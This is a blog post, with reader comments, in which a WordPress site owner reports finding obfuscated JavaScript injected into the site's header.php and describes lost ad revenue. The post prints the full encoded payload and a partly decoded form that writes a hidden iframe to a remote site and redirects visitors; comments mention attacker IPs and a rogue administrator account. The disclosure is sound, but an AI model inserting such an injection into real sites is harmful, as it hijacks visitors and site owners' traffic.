WordPress Site Hacked With URL Encoded Javascript document.write


If you happened to read my article about my Google AdSense CTR decreasing over the past few months, you may have been wondering why it was dropping so much. Well, I finally started looking into the code of my blog and I found that my site was hacked. The header.php file had some Javascript add/injected into it. The following is the code that was found in my header file:

<script language=javascript>document.write(unescape(‘%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E’));dF(‘%264Dtdsjqu%264Fepdvnfou/xsjuf%2639%2633%264Dtdsjqu%2631tsd%264E%266D%2633%2633%2C%2633iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G3%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ
%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2633%2C%2633%266D%2633%264F%264D%266D0tdsjqu%264F%2633%263%3A%264C%264D0tdsjqu%264F%261B%264Dtdsjqu%264F%261Bjg%2639uzqfpg%2639i%263%3A%264E%264E%2633voefgjofe%2633%263%3A%268C%261%3A%261B%261%3Aepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E%2638iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G4%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ
%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2638%2631xjeui%264E2%2631ifjhiu%264E2
%2631cpsefs%264E1%2631gsbnfcpsefs%264E1%264F%264D0jgsbnf%264F%2633%263%3A%264C%2631%261B%268E%261Bfmtf%2631jg%2639i/joefyPg%2639%2633iuuq%264B%2633%263%3A%264E%264E1%263%3A%268C%261B%261%3A%261%3Axjoepx/mpdbujpo%264Ei%264C%261B%268E%261B%264D0tdsjqu%264F1’)</script>

Put this into a URL decoder and you get the following:

<script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>


dF('&4Dtdsjqu&4Fepdvnfou/xsjuf&39&33&4Dtdsjqu&31tsd&4E&6D&33&33,
&33iuuq&4B00jutbmmcsfbltpgu/ofu0uet0jo/dhj&4G3&37tfpsfg&4E&33,
fodpefVSJDpnqpofou&39epdvnfou/sfgfssfs&3:,&33&37qbsbnfufs&4E
&35lfzxpse&37tf&4E&35tf&37vs&4E2&37IUUQ`SFGFSFS&4E&33
,&31fodpefVSJDpnqpofou&39epdvnfou/VSM&3:,&33&37efgbvmu`lfzxpse&4Eopuefgjof&33
,&33&6D&33&4F&4D&6D0tdsjqu&4F&33&3:&4C&4D0tdsjqu&4F&1B&4Dtdsjqu&4F&1Bjg
&39uzqfpg&39i&3:&4E&4E&33voefgjofe&33&3:&8C&1:&1B&1:epdvnfou/xsjuf&39&33
&4Djgsbnf&31tsd&4E&38iuuq&4B00jutbmmcsfbltpgu/ofu0uet0jo/dhj&4G4&37tfpsfg&4E&33,fodpefVSJDpnqpofou&39epdvnfou/sfgfssfs&3:,&33&37qbsbnfufs&4E&35lfzxpse&37tf&4E&35tf&37vs&4E2&37IUUQ
`SFGFSFS&4E&33,&31fodpefVSJDpnqpofou&39epdvnfou/VSM&3:,&33&37efgbvmu
`lfzxpse&4Eopuefgjof&38&31xjeui&4E2&31ifjhiu&4E2&31cpsefs&4E1
&31gsbnfcpsefs&4E1&4F&4D0jgsbnf&4F&33&3:&4C&31&1B&8E&1Bfmtf
&31jg&39i/joefyPg&39&33iuuq&4B&33&3:&4E&4E1&3:&8C&1B&1:&1:xjoepx/mpdbujpo&4Ei&4C&1B&8E&1B&4D0tdsjqu&4F1')

These bastards put some code into the header of my site that would end up redirecting all of my users after 5-15 seconds. Each time, I’d end up losing the traffic, and in turn, the potential for AdSense revenue. I thought that my decreasing Google AdSense CTR was just a sign of the time, turns out otherwise. It turns out my ads just weren’t being displayed long enough to be seen by my users. If they’re only displayed for a few seconds, the chances are they aren’t going to be viewed by as many users. I’ll be updating everyone on

Has anyone else had their WordPress site hacked like this before? Have you found out how the hackers got into your site?

4 thoughts on “WordPress Site Hacked With URL Encoded Javascript document.write”

  1. The same thing happened to me except it didn’t take 15 seconds to redirect. It was more like right away. It seemed like each time the script would send to another .net site that was all about ads. I did capture two ip addresses. 89.207.130.72 and 208.94.233.33 seemed to show up quite consistently. I am wondering how these jerks got access to my site. There has to be some kind of security hole because I am the only one that knows my passwords.

    One more thing. My hosting is with hostgator and they reported that they removed the problem file. They reported that this file /2009/09/28788.php had gotten uploaded to my account. One thing they did not check was the associate database entries for wordpress. The hacker added themselves as an administrator to the site. You might not see it in the wp-admin area but you can look at the users entries in the database. I would suggest removing asap and keep checking to make sure they don’t have a backdoor script running.

  2. I’m wondering how they got access too. According to Sam’s comment above, it may have been from a 3rd party ad network. I’m wondering if the Kontera links that I was using were somehow compromised?

    Either way, I lost about $75 in revenue over the 2 days that this was happening. Not cool.

  3. Yeah guys I am hosted with godaddy and I had the same issue. My guess is that its either a wordpress hole or your passwords like mine were not as strong as they should have been. I had a whole slew of “users” that were clearly fakes and one of them was magically an administrator. I deleted all those accounts including the administrator one. Then I edited the header.php file and removed that encoded javascript junk. I am going to monitor it closely for a few days.

    spicuo.us what kind of site are you running getting $30+ a day in ad revenue. Man I would love to see that kind of income. I am lucky to see around $30 in a two week span!

Leave a Reply

Your email address will not be published. Required fields are marked *